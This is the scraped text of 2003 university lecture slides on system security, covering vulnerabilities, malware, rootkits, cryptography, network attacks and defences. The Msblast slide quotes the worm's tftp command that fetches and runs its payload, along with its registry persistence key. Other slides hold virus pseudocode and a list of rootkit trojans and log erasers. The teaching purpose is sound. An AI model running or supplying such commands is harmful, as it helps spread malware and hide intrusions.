* Your assessment is very important for improving the workof artificial intelligence, which forms the content of this project
Download System Security - Wright State engineering
Cryptography wikipedia , lookup
Buffer overflow wikipedia , lookup
Web of trust wikipedia , lookup
Buffer overflow protection wikipedia , lookup
Cyber-security regulation wikipedia , lookup
Cross-site scripting wikipedia , lookup
Quantum key distribution wikipedia , lookup
Address space layout randomization wikipedia , lookup
Wireless security wikipedia , lookup
Microsoft Security Essentials wikipedia , lookup
Post-quantum cryptography wikipedia , lookup
Next-Generation Secure Computing Base wikipedia , lookup
Deep packet inspection wikipedia , lookup
Denial-of-service attack wikipedia , lookup
Diffie–Hellman key exchange wikipedia , lookup
Computer and network surveillance wikipedia , lookup
Computer security wikipedia , lookup
Security-focused operating system wikipedia , lookup
Mobile security wikipedia , lookup
Distributed firewall wikipedia , lookup
Unix security wikipedia , lookup
System Security Prabhaker Mateti Wright State University A Few Assessments … Top 20 Vulnerabilities/ NIPC+FBI+SANS (May 29, 2003) W1 W2 W3 W4 W5 W6 W7 W8 W9 WA Internet Information Services (IIS) MDAC Remote Data Services Microsoft SQL Server NETBIOS -- Unprotected Networking Shares Anonymous Logon -- Null Sessions LAN Manager Authentication -- Weak LM Hashing No Passwords or Weak Passwords Internet Explorer Remote Registry Access Windows Scripting Host SysSec/SIAC2003 Mateti/WrightStateU 3 Top 20 Vulnerabilities/ NIPC+FBI+SANS (May 29, 2003) U1 U2 U3 U4 U5 U6 U7 U8 U9 UA RPC Remote Procedure Calls Apache Web Server Secure Shell (SSH) SNMP File Transfer Protocol (FTP) R-Services -- Trust Relationships Line Printer Daemon (LPD) Sendmail BIND/DNS No Passwords or Weak Passwords SysSec/SIAC2003 Mateti/WrightStateU 4 Threats To The National Infrastructures (Defense Science Board) 1. 2. 3. 4. 5. 6. 7. 8. 9. 10. Incomplete, inquisitive and unintentional blunders. Hackers driven by technical challenges. Disgruntled employees or customers seeking revenge. Criminals interested in personal financial gain or stealing services. Organized crime with the intent of hiding something or financial gain. Organized terrorist groups attempting to influence U.S. policy by isolated attacks. Foreign espionage agents seeking to exploit information for economic, political, or military purposes. Tactical countermeasures intended to disrupt specific weapons or command structures. Multifaceted tactical information warfare applied in a broad orchestrated manner to disrupt a major U.S. military mission. Large organized groups or nation-states intent on overthrowing the United States. SysSec/SIAC2003 Mateti/WrightStateU 5 Just the facts Madam Security Incidents / CERT 76,404 Jan –June 2003 82,094 all of 2002 “CERT uses the word "incident" as an administrative term that groups together any related set of activities; for example, activities in which the same tool or exploit is used by an intruder. A single "incident" can involve anything from a single host computer to a very large number of host computers, at a single site or at hundreds of thousands of sites.” SysSec/SIAC2003 Mateti/WrightStateU 7 Number of Hosts in the DNS (isc.org Internet Domain Survey, Jan 2003) Jan 2003 171,638,297 Jul 2002 Jan 2002 162,128,493 147,344,723 Jul 2001 Jan 2001 125,888,197 109,574,429 Jul 2000 Jan 2000 93,047,785 72,398,092 SysSec/SIAC2003 Mateti/WrightStateU 8 SysSec/SIAC2003 Mateti/WrightStateU 9 Terms … “So you got r00ted.’’ Your machine has been compromised. root = administrator = super-user An unauthorized user has obtained root privileges. A rootkit may have been installed. Forensic analyses made with tools existing on that system are unreliable. SysSec/SIAC2003 Mateti/WrightStateU 11 Denial of Service (DoS) We think of computer systems as providing services to authorized users. When a system is deliberately made to crash, or made to run legitimate users' programs so very slowly that it is unusable, we refer to it as a "denial of service attack." The attacker accomplishes this by running certain cleverly composed programs, and is pre-aware of the consequences. SysSec/SIAC2003 Mateti/WrightStateU 12 Black Hats v. White Hats Black hats are the "bad" guys in that they use their knowledge to unauthorizedly break into even more systems, and pass their knowledge to other insiders. White hats are the "good" guys: they are mostly into forensics and prevention of attacks. SysSec/SIAC2003 Mateti/WrightStateU 13 Vulnerability, … Vulnerability: A weakness that can be exploited to cause damage. Attack: A method of exploiting a vulnerability. Threat: A motivated, capable adversary that mounts attacks. SysSec/SIAC2003 Mateti/WrightStateU 14 Hacker v. Attacker v. Intruder Hacker = One who programs enthusiastically, even obsessively. An expert at a particular program, as in ‘a Unix hacker’. A hacker enjoys exploring the details of programmable systems and how to stretch their capabilities. A hacker has ethics. SysSec/SIAC2003 Mateti/WrightStateU 15 Viruses Viruses are "programs" that modify other programs on a computer, inserting copies of themselves. Viruses are not officially programs: – They cannot run on their own. – Need to have some host program. – When the host program is run, the virus runs. SysSec/SIAC2003 Mateti/WrightStateU 16 Structure of Viruses V() { infectExecutable(); if (triggered()) doDamage(); jump to main of infected program; } void infectExecutable() { file = chose an uninfected executable file; prepend V to file; } void doDamage() { ... } int triggered() { return (some test? 1 : 0); } SysSec/SIAC2003 Mateti/WrightStateU 17 Worms Worms are programs that propagate from computer to computer on a network. Worms can run independently. Worms may have (different) portions of themselves running on many different machines. Worms do not change other programs, although they may carry other code that does. SysSec/SIAC2003 Mateti/WrightStateU 18 Trojans A Trojan mimics the functionality of its namesake legitimate program. But has a hidden “agenda.” Ex: wu-ftpd Trojan - Login with specific user/password gives a root shell. SysSec/SIAC2003 Mateti/WrightStateU 19 Backdoors Also called trap doors. Allow unauthorized access to a system. The absence of backdoors cannot be established. SysSec/SIAC2003 Mateti/WrightStateU 20 Malware Viruses + Worms + Trojans + … Any “program” that has a “malicious” intent … SysSec/SIAC2003 Mateti/WrightStateU 21 System Security “System Security” = Computer Security + Network Security + Internet Security Trojan Horses, Viruses and Worms Privacy and Authentication TCP/IP exploits Firewalls Secure Configuration of Personal Machines Buffer Overflow and Other Bug Exploitation Writing Bug-free and Secure Software Secure e-Commerce Transactions … SysSec/SIAC2003 Mateti/WrightStateU 22 Current practices, and their problems Improper Configuration Out of the box installations are rarely properly configured. Standard user accounts with standard passwords. Running unneeded services. Leaving sensitive files read/writeopen. SysSec/SIAC2003 Mateti/WrightStateU 24 Fortification Start with a properly configured system. Delete weak or unneeded components. Add protective layers. Keep detailed logs. SysSec/SIAC2003 Mateti/WrightStateU 25 Hardened OS Often “equated” with fortification. Rebuilding an OS from the same source code but by using a more rigorous compiler. Redesigning portions of an OS. Statically v. dynamically configured. SysSec/SIAC2003 Mateti/WrightStateU 26 Rootkits “A rootkit is a collection of tools and utilities that attackers use to hide their presence and gather data to help them infiltrate further across the network. Rootkits insert backdoors, install Trojans, and patch existing programs.’’ A rootkit may disable auditing when a certain user is logged on. A rootkit could allow anyone to log in if a certain backdoor password is used. A rootkit could patch the kernel itself, allowing anyone to run privileged code if they use a special filename Installed after the attacker gains access. Cannot be detected by firewalls or anti-virus scanners. 203 results for search “rootkit’’ on www.packetstormsecurity.org SysSec/SIAC2003 Mateti/WrightStateU 27 Rootkits “Rootkit” was originally a Unix term, derived from the word “root”. Unix rootkits typically replace system binaries with trojaned binaries. The trojaned binaries hide the attacker activities SysSec/SIAC2003 Mateti/WrightStateU 28 Windows Rootkit A Windows rootkit typically replaces APIs, not binaries. Any program that calls those replaced APIs is potentially affected. The rootkit typically hides itself using the hacked Windows installation. A typical Windows rootkit can hide files, folders, processes, services, and registry entries SysSec/SIAC2003 Mateti/WrightStateU 29 Windows Rootkit Examples null.sys HE4Hook Hacker Defender Slanret He4Hook Vanquish Fu … SysSec/SIAC2003 Mateti/WrightStateU 30 Null session Unauthenticated connection Empty username, empty password “Null sessions can *always* be established to NT4, Windows 2000, and Windows XP machines. If the machine's server service is enabled, and ports 139 or 445 are available, then you can do a net use with anonymous credentials, and the system will respond with "Command completed successfully". This has not changed from NT4 to Win2K to XP.’’ -- [email protected] SysSec/SIAC2003 Mateti/WrightStateU 31 Linux Rootkit Examples Linux Rootkit (LRK) TeLeKit Adore Knark t0rnkit Kernel Intrusion System (KIS) … SysSec/SIAC2003 Mateti/WrightStateU 32 _ _ | | (_)_ __ _ ___ __ | | | | '_ \| | | \ \/ / | |___| | | | | |_| |> < |_____|_|_| |_|\__,_/_/\_\ ____ _ _ _ _ ___ ___ ___ | _ \ ___ ___ | |_| | _(_) |_ |_ _|_ _|_ _| | |_) / _ \ / _ \| __| |/ / | __| | | | | | | | _ < (_) | (_) | |_| <| | |_ | | | | | | |_| \_\___/ \___/ \__|_|\_\_|\__| |___|___|___| chfn Trojaned! User->r00t chsh Trojaned! User->r00t inetd Trojaned! Remote access login Trojaned! Remote access ls Trojaned! Hide files du Trojaned! Hide files ifconfig Trojaned! Hide sniffing netstat Trojaned! Hide connections passwd Trojaned! User->r00t ps Trojaned! Hide processes top Trojaned! Hide processes rshd Trojaned! Remote access syslogd Trojaned! Hide logs linsniffer Packet sniffer! fix File fixer! z2 Zap2 utmp/wtmp/lastlog eraser! wted wtmp/utmp editor! lled lastlog editor! bindshell port/shell type daemon! tcpd Trojaned! Hide connections, avoid denies SysSec/SIAC2003 Mateti/WrightStateU 33 Msblast.exe (Aug 12, 2003) The exploit code is derived from the well known dcom.c exploit. Exploits the MS DCOM RPC vulnerability using TCP port 135. Produces a remote command line shell. Runs the following commands: Creates the following registry key to run at boot: tftp -i x.x.x.x GET msblast.exe start msblast.exe msblast.exe HKLM\Software\Microsoft\Windows\CurrentVersion\Run\windows auto update = 'msblast.exe' The worm will begin to scan the local class B subnet, and will also generate a random address to begin scanning at, then will sequentially scan from that point forward incrementing by host address, class c, class b and class a. It can scan hosts at a rate of 20 per second. The worm contains the following text, which does not get displayed: “I just want to say LOVE YOU SAN!! billy gates why do you make this possible ? Stop making money and fix your software!!” SysSec/SIAC2003 Mateti/WrightStateU 34 Booting Up BIOS OS Kernel Initialization User logins SysSec/SIAC2003 Mateti/WrightStateU 35 boot.ini [boot loader] timeout=30 default=multi(0)disk(0)rdisk(0)partition(9)\WINDOWS [operating systems] C:\bootsect\hdc3grub.bin="Booting From FAT32on120GB" multi(0)disk(0)rdisk(0)partition(3)\WINDOWS="Windows XP Pr multi(0)disk(0)rdisk(0)partition(9)\WINDOWS="Windows XP Pr multi(0)disk(0)rdisk(0)partition(14)\WINDOWS="Windows XP P C:\bootsect\hdc3grub.bin="Linux via Grub" SysSec/SIAC2003 Mateti/WrightStateU 36 /boot/grub/menu.lst timeout 10 default 1 title failsafe kernel (hd0,6)/boot/vmlinuz root=/dev/hda7 failsafe devfs=nomount hdc=ide-scsi acpi=off initrd (hd0,6)/boot/initrd.img title linux-smp kernel (hd0,6)/boot/vmlinuz-smp root=/dev/hda7 devfs=mount hdc=ide-scsi acpi=off initrd (hd0,6)/boot/initrd-smp.img title windows root (hd0,0) chainloader +1 SysSec/SIAC2003 Mateti/WrightStateU 37 Human User Authentication Something you know Something you have (e.g., a password or other secret); (e.g., smart card, credit card); Something you are (e.g., fingerprints, retinal scan, voice print). SysSec/SIAC2003 Mateti/WrightStateU 38 Passwords Weak passwords; social engineering. telnet, ftp, … passwords travel the network in the clear; can be sniffed. One Time Passwords SysSec/SIAC2003 Mateti/WrightStateU 39 Cryptography "Computationally Infeasible” N = 2^a * 3^b * 5^c * 7^d * ... One way hash function – takes a variable-length input sequence of bytes and converts it into a fixed-length sequence. – designed to be computationally infeasible to reverse the process SysSec/SIAC2003 Mateti/WrightStateU 40 Symmetric Keys sender and receiver of a message share a single, common key. If ct = encryption (pt, key), then pt = decryption (ct, key). DES IDEA Blowfish SysSec/SIAC2003 Mateti/WrightStateU 41 Public and Private Keys a public key known to everyone, and a private or secret key known only to the recipient of the message The two keys are mathematically related, yet it is computationally infeasible to deduce one from the other. A global registry of public keys is needed RSA SysSec/SIAC2003 Mateti/WrightStateU 42 Man-in-the-Middle Attack The public key-based communication between say Alice and Bob is vulnerable. Let us assume that Mallory, a cracker, not only can listen to the traffic between Alice and Bob, but also can modify, delete, and substitute Alice's and Bob's messages, as well as introduce new ones. Mallory can impersonate Alice when talking to Bob and impersonate Bob when talking to Alice. Here is how the attack works. Bob sends Alice his public key. Mallory intercepts the key and sends her own public key to Alice. Alice generates a random session key, encrypts it with "Bob’s" public key (which is really Mallory's), and sends it to Bob. Mallory intercepts the message. He decrypts the session key with his private key, encrypts it with Bob's public key, and sends it to Bob. Bob receives the message thinking it came from Alice. He decrypts it with his private key and obtains the session key. Alice and Bob start exchanging messages using the session key. Mallory, who also has that key, can now decipher the entire conversation. SysSec/SIAC2003 Mateti/WrightStateU 43 Buffer Overflow “Quick: What's the computer vulnerability of the decade? It's not the Y2K bug, according to computer science and security analysts, but a security weakness known as the buffer overflow .” Executable code is injected on to the runtime stack. The return address that was on the stack is modified to point to the beginning of this code. The executable code chosen produces a shell. A root-privileged program is so exploited; so, you are r00ted. SysSec/SIAC2003 Mateti/WrightStateU 44 Buffer Overflow Many of the Top 20 vulnerabilities are buffer overflow problems. Caused by a simple class of programming errors. C and its promiscuous style. SysSec/SIAC2003 Mateti/WrightStateU 45 Network Security Ethernet is a broadcast medium. Packet switching. SysSec/SIAC2003 Mateti/WrightStateU 46 Security of the Connection Least secure: Wireless networking Second least secure: Always-on wired connections Second most secure: Intermittent wired connections (dial-up) Most secure: Never connected. SysSec/SIAC2003 Mateti/WrightStateU 47 TCP/IP Design Problems Designed with too little concern for security. All data, including various fields in the protocol headers, are sent in the clear. Sender and Receiver in the packet can be spoofed. SysSec/SIAC2003 Mateti/WrightStateU 48 IP4 Spoofing IP address: a.b.c.d, 4-bytes. IP packet contains the IP addresses of sender and receiver. Everything in the clear. IP spoofing replaces the IP address of (usually) the sender or (in rare cases) the destination with a different address. Services that authenticate based on the IP addresses are vulnerable. RPC, NFS, r-commands (rlogin, rsh, rcp, etc.), X windows, … SysSec/SIAC2003 Mateti/WrightStateU 49 IP Fragment Attacks When packets are too large to be sent in a single IP packet, due to interface hardware limitations for example, they can be split up by an intermediate router. The final destination will reassemble all the fragments of an IP packet. Attackers create artificially fragmented packets in order to circumvent firewalls that do not perform packet reassembly. In the IP layer implementations of nearly all OS, there are bugs in the reassembly code. Attackers create fragments that trigger these bugs. SysSec/SIAC2003 Mateti/WrightStateU 50 IPsec Data Confidentiality: IPSec sender can encrypt packets before transmitting them across a network. Data Integrity: IPSec receiver can authenticate packets sent by the IPSec sender to ensure that the data has not been altered during transmission. Data Origin Authentication: IPSec receiver can authenticate the source of the IPSec packets sent. This service is dependent upon the data integrity service. Anti-Replay: IPSec receiver can detect and reject replayed packets. Two encryption modes: Transport and Tunnel. SysSec/SIAC2003 Mateti/WrightStateU 51 IP6 Expanded Addressing Capabilities Header Format Simplification Improved Support for Extensions and Options Flow Labeling Capability Authentication and Privacy Capabilities SysSec/SIAC2003 Mateti/WrightStateU 52 TCP Exploits The SYN Flood Connection Killing by RST Closing a Connection by FIN Connection Hijacking SysSec/SIAC2003 Mateti/WrightStateU 53 Covert Channels Sending of “data” not in the payload, but via other “places.” Headers. Sequence numbers. SysSec/SIAC2003 Mateti/WrightStateU 54 Probing Port Scanning is one of the most popular among the reconnaissance techniques. Find open ports Fingerprint the OS Stealth scan, Bounce scan, … nmap SysSec/SIAC2003 Mateti/WrightStateU 55 Sniffers A packet sniffer is a program that eavesdrops on the network traffic. It copies packets as they pass the NIC. An NIC in the normal mode reads packets destined to its specific MAC address, and all other packets are ignored. An NIC in promiscuous mode, receives all packets regardless of the MAC address. SysSec/SIAC2003 Mateti/WrightStateU 56 Well known Trojan Ports sample 22 23 41 41 456 901 999 6712 8879 27444 40412 65535 SysSec/SIAC2003 TCP Shaft TCP Fire Hacker TCP Deep Throat TCP Deep Throat TCP Hacker's Paradise TCP Backdoor.Devil TCP DeepThroat TCP Sub Seven TCP UDP BackOrifice 2000 UDP Trin00/TFN2K TCP The Spy TCP Adore Worm/Linux Mateti/WrightStateU 57 Distributed Denial of Service (DDoS) Several machines participate in a DoS attack of a victim. These participants are often compromised innocent machines serving the “attacks.” A remote client triggers the attack servers. SysSec/SIAC2003 Mateti/WrightStateU 58 DNS Attacks Domain Name Service protocol is inherently vulnerable. DNS cache poisoning. BIND 8 is the most popular DNS server. DNS servers running BIND are not up to date with security patches and software updates. On October 21, 2002, 9 of the 13 root name servers were the target of a DDoS attack. SysSec/SIAC2003 Mateti/WrightStateU 59 Protecting Our Systems Security Software Secure Shell, PGP, … Firewall Kits Tools – Top 50 Security Tools survey from www.nmap.org – http://www.packetfactory.net – nmap, SAINT, … – tcpdump, ethereal, snort, … – Password cracking – Tcpwrapper SysSec/SIAC2003 Mateti/WrightStateU 61 SSH (Secure Shell) telnet, rlogin, … do not authenticate the remote machine; SSH does. The password that the user types as part of the login ritual is sent as clear text by telnet and rlogin; SSH sends it encrypted. The data being sent and received by the RTF is also sent as clear text; SSH sends and receives it in encrypted form. SysSec/SIAC2003 Mateti/WrightStateU 62 SSH (Secure Shell) ssh1 v. ssh2 SSH exploits do exist. Susceptible to man in the middle attack Encryption and decryption consumes computing and elapsed time. Can be a nuisance. If the remote system has been legitimately reinstalled ... SysSec/SIAC2003 Mateti/WrightStateU 63 SSH client and servers ssh putty ttermpro openssh SysSec/SIAC2003 Mateti/WrightStateU 64 VPN (Virtual Private Network) Data travels over public networks, usually the Internet. The information needed to allow the data packets to be routed between the source node and the destination node is available to the public medium as in ordinary TCP/IP traffic, But, all other information is encrypted. PPTP, L2TP, IPsec SysSec/SIAC2003 Mateti/WrightStateU 65 File Integrity “Is the file what I installed? Did it change?” Time stamps, file size, … are not reliable. MD5 checksums. The MD5 algorithm takes as input an arbitrary length byte sequence and produces a 16-byte "fingerprint" or "message digest" of the input. It is conjectured that it is computationally infeasible to produce two messages having the same message digest, or to produce any message having a given pre-specified target message digest. SysSec/SIAC2003 Mateti/WrightStateU 66 Scanning for “Viruses” Scanners hook themselves in the read/write methods of the file sys. Search for patterns in the file content. Search for specific file names, … Can yield false positives. Can miss identifying malware. SysSec/SIAC2003 Mateti/WrightStateU 67 Packet Filters Drop packets based on matching certain parts: IP addresses, port numbers, protocols, flags. Network Address Translation - NAT IP port forwarding iptables -A FORWARD -d ! 192.168.17.0/24 -i eth1 -j prvt-extrn iptables -A FORWARD -s 130.108.17.0/24 -i eth2 -j dmz-extrn iptables -A FORWARD -d 130.108.17.0/24 -i eth0 -j extrn-dmz iptables -A FORWARD -j DROP -l SysSec/SIAC2003 Mateti/WrightStateU 68 Firewalls Packet filters Bastion Host Proxy services Stateful Inspection Three Myths of Firewalls Firewalls make the assumption that the only way in or out of a corporate network is through the firewalls; that there are no "back doors" to your network. Firewalls make the assumption that all of the bad guys are on the outside of the firewall, and everyone on the inside of the can be considered trustworthy. With macros, JavaScript, Java, … executable fragments can be embedded inside data. SysSec/SIAC2003 Mateti/WrightStateU 69 Windows XP Built-in “Firewall” SysSec/SIAC2003 Mateti/WrightStateU 70 Windows XP Built-in “Firewall” SysSec/SIAC2003 Mateti/WrightStateU 71 Intrusion Detection Detect probes. Constantly check file integrity. Constantly check which ports are open and why. Keep detailed logs of suspicious activity on a separate system. SysSec/SIAC2003 Mateti/WrightStateU 72 Amazon.com book search results (2003/08/26) Network security Internet security Computer security System security Homeland security Security SysSec/SIAC2003 Mateti/WrightStateU 813 1009 2871 1521 80 32000 73 Web Sites “There is an oceanic amount of material on network security available over the Internet.” -- A Web Page. How do we define a “Security Web Site”? 1000+ web sites SysSec/SIAC2003 Mateti/WrightStateU 74 A Few Chosen Security Websites www.incidents.org www.cert.org www.cerias.purdue.edu www.securityfocus.com lwn.net/security www.microsoft.com/security www.phrack.org SysSec/SIAC2003 Mateti/WrightStateU 75 Mateti/Internet Security Links CEG 429 Home Page www.cs.wright.edu/~pmateti/Courses/429 [local-link] OSIS Lab Home Page www.cs.wright.edu/~pmateti/OSIS [local-link] Support Web Site www.cs.wright.edu/~pmateti/InternetSecurity/ [local-link] SysSec/SIAC2003 Mateti/WrightStateU 76